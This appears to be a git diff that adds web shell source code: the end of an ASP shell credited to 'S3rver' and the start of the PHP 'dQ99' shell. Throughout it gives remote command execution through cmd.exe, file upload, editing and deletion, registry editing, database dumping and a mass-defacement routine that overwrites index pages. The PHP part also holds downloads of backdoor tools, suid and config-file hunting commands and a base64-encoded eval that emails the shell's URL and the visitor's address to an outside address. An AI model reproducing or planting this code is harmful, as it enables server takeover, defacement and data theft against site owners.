        " + End If + Response.Write "" + for each folderItem in ColFolders + Response.Write "" + Response.Write "" + Response.Write "" + next + Response.Write "
        <DIR> " & showobj(folderItem.path) & "  << PUT  << Copy/Move  << Delete

        " + marcatabela = true + for each FilesItem0 in ColFiles0 + If marcatabela = true then + corfundotabela = " bgcolor=""#EEEEEE""" + Else + corfundotabela = "" + End If + Response.Write ":: " & showobj(FilesItem0.path) & "" + marcatabela = NOT marcatabela + next + Response.Write "
          " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     o.GET.o    o.REN.o    o.DEL.o    o.VIEW.o    o.EDIT.o    o.Ýndir.o    o.FileCopy.o
        " + End If +End Sub +Select Case Trim(Request.QueryString("action")) + Case "get" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + MyFile.Copy (destino) + If Err.Number = 0 Then + Response.Write "


        File: " & caminho & "
        Copied to: " & destino + End If + Case "put" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + If Trim(Request.QueryString("arquivo")) = "" Then + caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + varpath = Trim(Request.QueryString("path")) + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MonRep = ObjFSO.GetFolder(caminho) + Set ColFolders = MonRep.SubFolders + Set ColFiles0 = MonRep.Files + + Response.Write "Select File:
        " + for each FilesItem0 in ColFiles0 + Response.Write "" + next + Response.Write "
        :: " & showobj(FilesItem0.path) & "  " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     :: SELECT ::
        " + Else + destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\" + arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(arquivo) + MyFile.Copy (destino) + If Err.Number = 0 Then + Response.Write "


        File: " & arquivo & "
        Copied to: " & destino + End If + End If + Case "del" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + MyFile.Delete + If Err.Number = 0 Then + Response.Write "" + Response.Write "


        Folder " & caminho & " Deleted.
        " + End If + + Case "fdel" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + ObjFSO.DeleteFolder caminho + If Err.Number = 0 Then + Response.Write "" + Response.Write "


        File " & caminho & " Deleted.
        " + End If + + Case "ren" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + If Trim(Request.QueryString("status")) <> "2" Then + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + arquivo = showobj(caminho) + Response.Write "
        " & arquivo & "
        " & _ + "
        " & _ + "" & _ + "" & _ + "" & _ + "New Name: " & _ + "  " & _ + "
        " + Else + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname")) + MyFile.Move (destino) + If Err.Number = 0 Then + Response.Write "


        Arquivo: " & caminho & "
        renomeado para: " & destino + Response.Write "" + End If + End If + Case "error" + Response.Write "
        CÓDIGO CORROMPIDO
        CORRUPT CODE
        " + Case "cmd" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Set oScript = Server.CreateObject("WSCRIPT.SHELL") + Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") + Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") + szCMD = Request.QueryString(".CMD") + If (szCMD <> "") Then + szTempFile = "c:\" & oFileSys.GetTempName( ) + Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) + Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) + End If + Response.Write "


        " + If (IsObject(oFile)) Then + On Error Resume Next + Response.Write "" + Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"
        ")," "," ") + oFile.Close + Call oFileSys.DeleteFile(szTempFile, True) + End If + Case "info" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Set WshNetwork = Server.CreateObject("WScript.Network") + Set WshShell = Server.CreateObject("WScript.Shell") + Set WshEnv = WshShell.Environment("SYSTEM") + Response.Write "
        " + Response.Write "User Properties:
        " + Response.Write "UserName: " & WshNetwork.UserName & "
        " + Response.Write "Computer Name: " & WshNetwork.ComputerName & "
        " + Response.Write "User Domain: " & WshNetwork.UserDomain & "
        " + Set Drives = WshNetwork.EnumNetworkDrives + For i = 0 to Drives.Count - 1 + Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
        " + Next + Response.Write "
        Cpu Information:
        " + Response.Write "Processor Architecture: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
        " + Response.Write "Number Of Processors: " & WshEnv("NUMBER_OF_PROCESSORS") & "
        " + Response.Write "Processor Identifier: " & WshEnv("PROCESSOR_IDENTIFIER") & "
        " + Response.Write "Processor Level: " & WshEnv("PROCESSOR_LEVEL") & "
        " + Response.Write "Processor Revision: " & WshEnv("PROCESSOR_REVISION") & "
        " + Response.Write "
        Operating System Information:
        " + Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
        " + Response.Write "Sistem OS: " & WshEnv("OS") & "
        " + Response.Write "Server Software: " & request.servervariables("SERVER_SOFTWARE") & "
        " + Response.Write "Cmd Path: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
        " + Response.Write "Public Paths: " & WshEnv("PATH") & "
        " + Response.Write "Executables: " & WshEnv("PATHEXT") & "
        " + Response.Write "Prompt: " & WshEnv("PROMPT") & "
        " + Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
        " + Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
        " + Response.Write "System32 Path: " & WshShell.CurrentDirectory & "
        " + Set Drives = Nothing + Set WshNetwork = Nothing + Set WshShell = Nothing + Set WshEnv = Nothing + Case "reg" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Set WshShell = Server.CreateObject("WScript.Shell") + Response.Write "
        Registry Editor:

        " + Select Case Trim(Request.QueryString("regaction")) + Case "w" + If Trim(Request.QueryString("process")) = "yes" Then + Select Case Trim(Request.QueryString("type")) + Case "1" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ") + Case "2" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD") + Case "3" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY") + Case "4" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ") + Case "5" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ") + End Select + Response.Write "

        Registry " + Response.Write Trim(Request.QueryString("key")) & " Changed.
        " + Response.Write "

        Main Menu
        " + Else + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        ROOT KEY NAMEABREVIAÇÃO
        HKEY_CURRENT_USER HKCU
        HKEY_LOCAL_MACHINE HKLM
        HKEY_CLASSES_ROOT HKCR
        HKEY_USERS HKEY_USERS
        HKEY_CURRENT_CONFIG HKEY_CURRENT_CONFIG

        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        Type Description Figure
        REG_SZ String String
        REG_DWORD Number DWORD
        REG_BINARY Binary VBArray DWORD
        REG_EXPAND_SZ String Expand (ex. ""%windir%\\calc.exe"") String
        REG_MULTI_SZ Array Of Strings VBArray Of Strings
        " + Response.Write "

        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        KEY:
        ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
        VALUE:
        TYPE:
        " + Response.Write "" + Response.Write "" + Response.Write "
        " + Response.Write "

        Main Menu
        " + End If + Case "r" + If Trim(Request.QueryString("process")) = "yes" Then + Response.Write "" & Trim(Request.QueryString("key")) & "
        " + Response.Write "Value: " & WshShell.RegRead (Trim(Request.QueryString("key"))) + Else + Response.Write "
        " + Response.Write "KEY:
        ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + End If + Response.Write "

        Main Menu
        " + Case "d" + If Trim(Request.QueryString("process")) = "yes" Then + teste = WshShell.RegDelete (Trim(Request.QueryString("key"))) + Response.Write "Chave " & Trim(Request.QueryString("key")) & " Deleted." + Else + Response.Write "
        " + Response.Write "KEY: ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + End If + Response.Write "

        Main Menu
        " + Case Else + Response.Write "WRITE VALUE

        " + Response.Write "READ VALUE

        " + Response.Write "DELETE KEY
        " + End Select + Set WshShell = Nothing + Case "txtview" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp & "" + file = Replace(Trim(Request.QueryString("file")),"|","\") + Set fso = CreateObject("Scripting.FileSystemObject") + Set a = fso.OpenTextFile(file) + Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"
        ")," "," ") + Set a = Nothing + Set fso = Nothing + Case "txtedit" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + If Request.Form.Count = 0 Then + file = Replace(Trim(Request.QueryString("file")),"|","\") + Set fso = CreateObject("Scripting.FileSystemObject") + Set a = fso.OpenTextFile(file) + Response.Write "
        " + Response.Write "
        " + Response.Write "" + Response.Write "     
        " + Set a = Nothing + Set fso = Nothing + Else + Select Case Trim(Request.Form("savemethod")) + Case "Save" + Set fso = CreateObject("Scripting.FileSystemObject") + novotexto = Trim(Request.Form("content")) + novotexto = Split(novotexto,vbCrLf) + Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2) + For i = 0 To UBound(novotexto) + objstream.WriteLine(novotexto(i)) + Next + objstream.Close + Set objstream = Nothing + Response.Write "Texto salvo: " & Replace(Trim(Request.Form("path")),"|","\") & "" + Case "Save as" + Set fso = CreateObject("Scripting.FileSystemObject") + novotexto = Trim(Request.Form("content")) + novotexto = Split(novotexto,vbCrLf) + caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" + Set objstream = fso.CreateTextFile(caminho,true,false) + For i = 0 To UBound(novotexto) + objstream.WriteLine(novotexto(i)) + Next + objstream.Close + Set objstream = Nothing + Response.Write "
        " + Response.Write "
        " + Response.Write "" + Response.Write "
        " + Case Else + caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename")) + MyFile.Move (destino) + If Err.Number = 0 Then + Response.Write "


        Arquivo: " & destino & " salvo!" + Response.Write "" + End If + End Select + End If + Case "download" + Response.Buffer = True + Response.Clear + strFileName = Replace(Trim(Request.QueryString("file")),"|","\") + strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\")) + strFileType = Request.QueryString("type") + if strFileType = "" then strFileType = "application/download" + Set fso = Server.CreateObject("Scripting.FileSystemObject") + Set f = fso.GetFile(strFilename) + intFilelength = f.size + Set f = Nothing + Set fso = Nothing + Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile + Response.AddHeader "Content-Length", intFilelength + Response.Charset = "UTF-8" + Response.ContentType = strFileType + Set Stream = Server.CreateObject("ADODB.Stream") + Stream.Open + Stream.type = 1 + Stream.LoadFromFile strFileName + Response.BinaryWrite Stream.Read + Response.Flush + Stream.Close + Set Stream = Nothing + Case "upload" + If Request.QueryString("processupload") <> "yes" Then + Response.Write "
        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        Select a file to upload:
        " + Else + Set Uploader = New FileUploader + Uploader.Upload() + If Uploader.Files.Count = 0 Then + Response.Write "File(s) not uploaded." + Else + For Each File In Uploader.Files.Items + File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\") + Response.Write "File Uploaded: " & File.FileName & "
        " + Response.Write "Size: " & File.FileSize & " bytes
        " + Response.Write "Type: " & File.ContentType & "

        " + Response.Write "" + Next + End If + End If + Case "mass" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) + On Error Resume Next + Set MonRep = ObjFSO.GetFolder(caminhodomass) + Set ColFolders = MonRep.SubFolders + for each folderItem in ColFolders + destino1 = folderItem.path & "\index.htm" + destino2 = folderItem.path & "\index.html" + destino3 = folderItem.path & "\index.asp" + destino4 = folderItem.path & "\index.cfm" + destino5 = folderItem.path & "\index.php" + destino6 = folderItem.path & "\default.htm" + destino7 = folderItem.path & "\default.html" + destino8 = folderItem.path & "\default.asp" + destino9 = folderItem.path & "\default.cfm" + destino10 = folderItem.path & "\default.php" + MeuArquivo.Copy(destino1) + MeuArquivo.Copy(destino2) + MeuArquivo.Copy(destino3) + MeuArquivo.Copy(destino4) + MeuArquivo.Copy(destino5) + MeuArquivo.Copy(destino6) + MeuArquivo.Copy(destino7) + MeuArquivo.Copy(destino8) + MeuArquivo.Copy(destino9) + MeuArquivo.Copy(destino10) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "
        <DIR> " & folderItem.path & "  DONE!
          " & UCase(Err.Description) & "
        " + End If + Err.Number = 0 + Response.Flush + If metodo = "brute" Then + Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) + End If + next + End Sub + Sub brutemass(caminho,massaction) + If massaction = "test" Then + On Error Resume Next + Set MonRep = ObjFSO.GetFolder(caminho) + Set ColFolders = MonRep.SubFolders + Set ColFiles0 = MonRep.Files + for each folderItem in ColFolders + Set TotalFolders = ObjFSO.GetFolder(folderItem.path) + Set EachFolder = TotalFolders.SubFolders + Response.Write "" + maindestino = folderItem.path & "\" + MeuArquivo.Copy(maindestino) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "" + End If + Err.Number = 0 + Response.Flush + If EachFolder.count > 0 Then + masscontador = 0 + for each subpasta in EachFolder + masscontador = masscontador + 1 + destino = subpasta.path & "\" + If masscontador = 1 Then + destinofinal = destino + pathfinal = subpasta.path + Err.Number = 0 + MeuArquivo.Copy(destinofinal) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "" + End If + Err.Number = 0 + Response.Flush + Else + MeuArquivo.Copy(destino) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "" + End If + Err.Number = 0 + Response.Flush + End If + next + masscontador = 0 + End If + Response.Write "
        <DIR> " & maindestino & "  Acesso Permitido
          " & UCase(Err.Description) & "
        <DIR> " & showobj(pathfinal) & "  Acesso Permitido
          " & UCase(Err.Description) & "
        <DIR> " & showobj(subpasta.path) & "  Acesso Permitido
          " & UCase(Err.Description) & "

        " + Call brutemass(folderItem.path & "\","test") + next + Set MonRep = Nothing + Set ColFolders = Nothing + Set ColFiles0 = Nothing + Else + If Request.Form.Count = 0 Then + Response.Write "

        Brute: Test and Deface root and sub directories.

        " + Response.Write "Single: Test and deface only root directories.

        " + Response.Write "" + Response.Write "" + Response.Write "
        Deface Code:
        " + Response.Write "
        " + Response.Write "Brute   " + Response.Write "Single
        " + Response.Write "
        " + Response.Write "" + Else + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + arquivomassdfc = patharquivotxt & "teste.txt" + Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) + vetordelinhas = Split(Request.Form("content"),VbCrLf) + For i = 0 To UBound(vetordelinhas) + Arquivotxt.WriteLine(vetordelinhas(i)) + Next + Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) + + If Request.Form("massopt") = "single" Then + Call themassdeface(caminho,"single",ObjFSO,MeuArquivo) + ElseIf Request.Form("massopt") = "brute" Then + Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) + End If + End If + End If + End Sub + If Trim(Request.QueryString("massact")) = "test" Then + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + arquivo = patharquivotxt & "_vti_cnf.log" + Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True) + Set MeuArquivo = ObjFSO.GetFile(arquivo) + Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test") + ElseIf Trim(Request.QueryString("massact")) = "dfc" Then + Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc") + End If + Case "fcopy" + If Trim(Request.Form("submit1")) = "Copy" Then + mptpath=Trim(Request.Form("path")) + mptdest=Trim(Request.Form("cf")) + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + isl = "" + if Trim(Request.Form("islem"))="kopyala" then + objFSO.CopyFolder mptpath,mptdest + isl="Copied.." + elseif Trim(Request.Form("islem"))="tasi" then + objFSO.MoveFolder mptpath,mptdest + isl="moved.." + end if + + response.Write "Command: "&isl + response.Write "
        File From: " & mptpath & "
        Copy to: " & mptdest + response.Write "
        " + Else + Response.Write "
        " + Response.Write "
        Copy Path : " + Response.Write "" + Response.Write "" + response.Write "" + Response.Write "
        " + response.Write "Copy" + response.Write "Move" + response.Write "
        " + response.Write "
        " + End IF + + Case "filecopy" + If Trim(Request.Form("submit1")) = "Copy" Then + mptpath=Trim(Request.Form("path")) + mptdest=Trim(Request.Form("cf")) + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + isl = "" + if Trim(Request.Form("islem"))="kopyala" then + objFSO.CopyFile mptpath,mptdest + isl="Copy.." + elseif Trim(Request.Form("islem"))="tasi" then + objFSO.MoveFile mptpath,mptdest + isl="move.." + end if + + response.Write "Command: "&isl + response.Write "
        File From: " & mptpath & "
        Copy to: " & mptdest + response.Write "
        " + Else + Response.Write "
        " + Response.Write "
        Copy Path : " + Response.Write "" + Response.Write "" + response.Write "" + Response.Write "
        " + response.Write "Copy" + response.Write "Move" + response.Write "
        " + response.Write "
        " + End IF + + + Case "search" + If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then + showdisks=FALSE + status5=Trim(Request.Form("status")) + if status5="" then status5=Trim(Request.QueryString("status")) + SELECT CASE status5 + + CASE "5" + Response.Write "
        "& Trim(Request.QueryString("path")) &"

        " + Response.Write "\n"; +} +echo htmlhead($hsafemode); +echo "
        " + set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1) + Response.Write "
        "&Server.HTMLEncode(f.readAll)&"
        " + if err.number=62 then Response.Write "":Response.End + + + + CASE "7": + Response.Write "Tables

        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objADOX = Server.CreateObject("ADOX.Catalog") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objADOX.ActiveConnection = objConn + + For Each table in objADOX.Tables + If table.Type = "TABLE" Then + Response.Write "4 "&table.Name&"
        " + End If + Next + + CASE "8": + table=Trim(Request.QueryString("table")) + Response.Write "

        Table Name: " & table & "




        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objRcs = Server.CreateObject("ADODB.RecordSet") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objRcs.Open table,objConn, adOpenKeyset , , adCmdText + + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + do while not objRcs.EOF + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + objRcs.MoveNext + loop + Response.Write "
           "&objRcs.Fields(i).Name&"   
        "&objRcs.Fields(i).Value&" 

        " + + + case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama")) + + END SELECT + + Else + showdisks=FALSE + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write "
        " + Response.Write "
        File Ext: " + Response.Write " " + Response.Write "" + Response.Write "
        " + End IF + + + + Case "sqlserver" + If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then + showdisks=FALSE + status5=Trim(Request.Form("status")) + if status5="" then status5=Trim(Request.QueryString("status")) + SELECT CASE status5 + + + CASE "7": + Response.Write "Tables

        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objADOX = Server.CreateObject("ADOX.Catalog") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objADOX.ActiveConnection = objConn + + For Each table in objADOX.Tables + If table.Type = "TABLE" Then + Response.Write "4 "&table.Name&"
        " + End If + Next + + CASE "8": + table=Trim(Request.QueryString("table")) + Response.Write "

        Table Name: " & table & "




        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objRcs = Server.CreateObject("ADODB.RecordSet") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objRcs.Open table,objConn, adOpenKeyset , , adCmdText + + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + do while not objRcs.EOF + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + objRcs.MoveNext + loop + Response.Write "
           "&objRcs.Fields(i).Name&"   
        "&objRcs.Fields(i).Value&" 

        " + + + END SELECT + + Else + showdisks=FALSE + checa = checking(cprthtml,keydec) + Call hdr() + + Response.Write "
        " + Response.Write "
        SQL Server connection string:
        " + Response.Write "" + Response.Write "
        " + response.Write "" + Response.Write "
        " + response.Write "
        " + + End IF + + + + Case "about" + showdisks=FALSE + checa = checking(cprthtml,keydec) + Call hdr() + response.Write "


        Coded By S3rver" + response.Write "

        " + response.Write "r57.biz" + response.Write "
        " + response.Write "E-Mail:thesabotaqe@gmail.com" + response.Write "

        " + response.Write "r57.biz" + + + Case Else + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Call showcontent() +End Select +If Err.Number <> 0 Then + Response.Write "
        ERRO: " & Err.Number & "

        " & UCase(Err.Description) & "
        Acesse denied." +End If +Response.Write endcode + +if showdisks then + +%> + + + + +<% + + + Set objFSO = Server.CreateObject("Scripting.FileSystemObject") + + Response.Write "


        " + for each drive_ in objFSO.Drives + Response.Write "" + next + Response.Write "" + Response.Write "
        Drives
        " + Response.write ";" + if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]" + if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]" + if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]" + if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]" + Response.Write "
        " + Response.write "H Local Path" + Response.Write "

        " +end if +%> +
        µ
        +
        µ
        +
        µ
        +
        µ
        \ No newline at end of file diff --git a/php/dq.php b/php/dq.php new file mode 100644 index 0000000..fa64d93 --- /dev/null +++ b/php/dq.php @@ -0,0 +1,3112 @@ + array($sh_mainurl."readme.txt","kiddie.php"), + "psyBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"), + "Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"), + "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"), +); +##[ AUTHENTICATION ]## +$auth = array( + "login" => "", + "pass" => "", + "md5pass" => "", + "hostallow" => array("*"), + "denied" => "".$sh_name.": access denied!", +); +##[ END AUTHENTICATION ]## +$curdir = "./"; +$tmpdir = ""; +$tmpdir_logs = "./"; +$log_email = "ayam@jago.us"; #Email logna +$sess_cookie = "dQ99shcook"; +$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending +$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies. +$usefsbuff = TRUE; +$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste +$surl_autofill_include = TRUE; +$updatenow = FALSE; +$gzipencode = TRUE; +$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses. +$hexdump_lines = 8; +$hexdump_rows = 24; +$millink = milw0rm(); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +$disablefunc = getdisfunc(); +##[ END OF CONFIGS ]## +error_reporting(E_ERROR | E_PARSE); +@ini_set("max_execution_time",0); +@set_time_limit(0); #No dQ in SafeMode +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) { strips($GLOBALS); } +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +@$f = $_REQUEST["f"]; +@extract($_REQUEST["dQ99shcook"]); +foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } } +$dQbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RdQ0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gImRROTlTaGVsbCBodHRwOi8vJHRhcmdldCBzYW1hICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IHNhbWEgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZGhpZXF3ZWJtYXJrZXJAeWFob28uY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($dQbuff)); +if ($surl_autofill_include) { + $include = "&"; + foreach (explode("&",getenv("QUERY_STRING")) as $v) { + $v = explode("=",$v); + $name = urldecode($v[0]); + $value = @urldecode($v[1]); + foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) { + if (strpos($value,$needle) === 0) { + $includestr .= urlencode($name)."=".urlencode($value)."&"; + } + } + } +} +if (empty($surl)) { + $surl = "?".$includestr; + $surl = htmlspecialchars($surl); +} +## FILE TYPES ## +$ftypes = array( + "html" => array("html","htm","shtml"), + "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe" => array("sh","install","bat","cmd"), + "ini" => array("ini","inf","conf"), + "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb" => array("sdb"), + "phpsess" => array("sess"), + "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), + array("\.tgz$",1,"",""), + array("\.gz$",1,"",""), + array("\.tar$",1,"",""), + array("\.bz2$",1,"",""), + array("\.zip$",1,"",""), + array("\.rar$",1,"",""), + array("\.php$",1,"",""), + array("\.php3$",1,"",""), + array("\.php4$",1,"",""), + array("\.jpg$",1,"",""), + array("\.jpeg$",1,"",""), + array("\.JPG$",1,"",""), + array("\.JPEG$",1,"",""), + array("\.ico$",1,"",""), + array("\.gif$",1,"",""), + array("\.png$",1,"",""), + array("\.htm$",1,"",""), + array("\.html$",1,"",""), + array("\.txt$",1,"","") +); +## QUICK COMMANDS ## +if (!$win) { + $cmdaliases = array( + array("", "ls -al"), + array("Find all suid files", "find / -type f -perm -04000 -ls"), + array("Find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("Find all sgid files", "find / -type f -perm -02000 -ls"), + array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("Find config.inc.php files", "find / -type f -name config.inc.php"), + array("Find config* files", "find / -type f -name \"config*\""), + array("Find config* files in current dir", "find . -type f -name \"config*\""), + array("Find all writable folders and files", "find / -perm -2 -ls"), + array("Find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("Find all writable folders", "find / -type d -perm -2 -ls"), + array("Find all 